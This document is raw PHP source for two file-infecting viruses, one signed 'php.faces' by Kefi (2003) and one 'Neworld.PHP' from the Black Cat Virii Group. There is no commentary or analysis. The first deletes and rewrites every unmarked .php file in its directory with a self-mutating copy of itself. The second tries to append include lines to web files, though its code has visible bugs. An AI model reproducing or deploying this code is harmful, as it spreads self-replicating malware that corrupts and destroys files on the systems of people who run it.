<?php $ypxqrpsqcc = fopen(__FILE__, "r"); $bbugesqpty = substr(fread($ypxqrpsqcc, filesize(__FILE__)), 0, 1249); fclose($ypxqrpsqcc); $dhbpgxtamn = array("ypxqrpsqcc", "bbugesqpty", "dhbpgxtamn", "cctsvcopcx", "wurwejtvjx", "ccznwozuuo", "uudxleoyja", "ionwdbkwfh", "zohqscoxob", "skzmabzbfe"); for($cctsvcopcx = 0; $cctsvcopcx < count($dhbpgxtamn); $cctsvcopcx++){ $wurwejtvjx = chr(rand(97, 122)); for($ccznwozuuo = 0; $ccznwozuuo < 9; $ccznwozuuo++) $wurwejtvjx = $wurwejtvjx . chr(rand(97, 122)); $bbugesqpty = str_replace("$dhbpgxtamn[$cctsvcopcx]", "$wurwejtvjx", "$bbugesqpty"); } $uudxleoyja = opendir("."); while(false !== ($ionwdbkwfh = readdir($uudxleoyja))){ if($ionwdbkwfh != "." && $ionwdbkwfh != ".."){ if(substr($ionwdbkwfh, -3) == "php"){ $zohqscoxob = fopen($ionwdbkwfh, "r"); $skzmabzbfe = substr(fread($zohqscoxob, filesize($ionwdbkwfh)), 5); fclose($zohqscoxob); if(!strstr($skzmabzbfe, "php.faces")){ unlink("$ionwdbkwfh"); $zohqscoxob = fopen($ionwdbkwfh, "a+"); fwrite($zohqscoxob, "$bbugesqpty"); fwrite($zohqscoxob, "$skzmabzbfe"); fclose($zohqscoxob); } } } } closedir($uudxleoyja); // php.faces (c) by Kefi, 2003 ?> <?php $vir_string = "Neworld.PHP\n"; $virstringm = "Welcome To The New World Of PHP Programming\n"; $virt = $vir_string . $virstringm; echo $virt; $all = opendir('C:\Windows\'); while ($file = readdir($all)) { $inf = true; $exe = false; if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.html')) || ($exe = strstr ($file, '.htm')) || ($exe = strstr ($file, '.htt')) ) if ( is_file($file) && is_writeable($file) ) { $new = fopen($file, "r"); $look = fread($new, filesize($file)); $yes = strstr ($look, 'neworld.php'); if (!$yes) $inf = false; } if ( ($inf=false) ) { $new = fopen($file, "a"); $fputs($new, "<!-- "); $fputs($new, "Neworld.PHP - "); $fputs($new, "Made By Xmorpfic, "); $fputs($new, "www.shadowvx.com/bcvg, "); $fputs($new, "The Black Cat Virii Group."); $fputs($new, "--->"); $fputs($new, "<?php "); $fputs($new, "include(\""); $fputs($new, __FILE__); $fputs($new, "\"); "); $fputs($new, "?>"); return; } } closedir($all); // Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group. ?>